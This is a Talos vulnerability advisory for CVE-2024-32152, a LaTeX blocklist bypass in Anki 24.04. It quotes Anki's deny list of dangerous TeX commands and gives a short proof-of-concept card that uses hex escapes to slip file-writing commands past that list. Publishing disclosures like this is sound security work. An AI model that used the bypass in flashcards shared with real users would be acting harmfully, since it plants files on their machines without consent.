Talos Vulnerability Report

TALOS-2024-1994

Ankitects Anki LaTeX Blocklist Bypass vulnerability

July 22, 2024

CVE Number

CVE-2024-32152

SUMMARY

A blocklist bypass vulnerability exists in the LaTeX functionality of Ankitects Anki 24.04. A specially crafted malicious flashcard can lead to an arbitrary file creation at a fixed path. An attacker can share a malicious flashcard to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ankitects Anki 24.04

PRODUCT URLS

Anki - <https://apps.ankiweb.net/&gt;

CVSSv3 SCORE

3.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

CWE

CWE-184 - Incomplete Blacklist

DETAILS

Anki is an open-source program that helps with memorization of information through the use of flash cards. It supports syncing of these cards across multiple computers as well as sharing cards with other users. It supports multiple different content types such as images, audio, videos, and scientific notation (via LaTeX).

Anki offers users the option to publicy share their decks, and it is normal behaviour to use them; there are no warnings or checks in place to prevent using cards from someone else. A malicious user could share a deck to trigger the following vulnerability.

Anki uses LaTeX to show images or other TeX models in the flashcards. There are some TeX commands which will allow you to do things you shouldn’t do, such as read files or write files. This requires MiKTeX to be installed as suggest by Anki’s documentation. Anki uses a blocklist to prevent these commands from being called. We can get around this blocklist using hex characters.

Anki uses this code to block bad commands from being called.

for bad in (
    "\\write18",
    "\\readline",
    "\\input",
    "\\include",
    "\\catcode",
    "\\openout",
    "\\write",
    "\\loop",
    "\\def",
    "\\shipout",
):
    # don't mind if the sequence is only part of a command
    bad_re = f"\\{bad}[^a-zA-Z]"
    if re.search(bad_re, tmplatex):
        return col.tr.media_for_security_reasons_is_not(val=bad)

We can replace a character with its hex code to get around this blocklist. For example:

\documentclass[12pt]{article}
\special{papersize=3in,5in}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath}
\pagestyle{empty}
\setlength{\parindent}{0in}
\begin{document}
\newwrite\outfile
\immediate\openou^^74\outfile=evil.txt
\wri^^74e\outfile{Hello, world!}
\closeout\outfile

An attacker using this bypass can create a file with arbitrary content in the temp directory for the application (/tmp/anki/ in Linux and c:\Users\<Username>\AppData\Local\Temp\anki_temp\ in Windows).

TIMELINE

2024-05-27 - Vendor Disclosure
2024-06-24 - Vendor Patch Release
2024-07-22 - Public Release

Credit

Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B.

---

Vulnerability Reports Next Report

TALOS-2024-1993

Previous Report

TALOS-2024-1995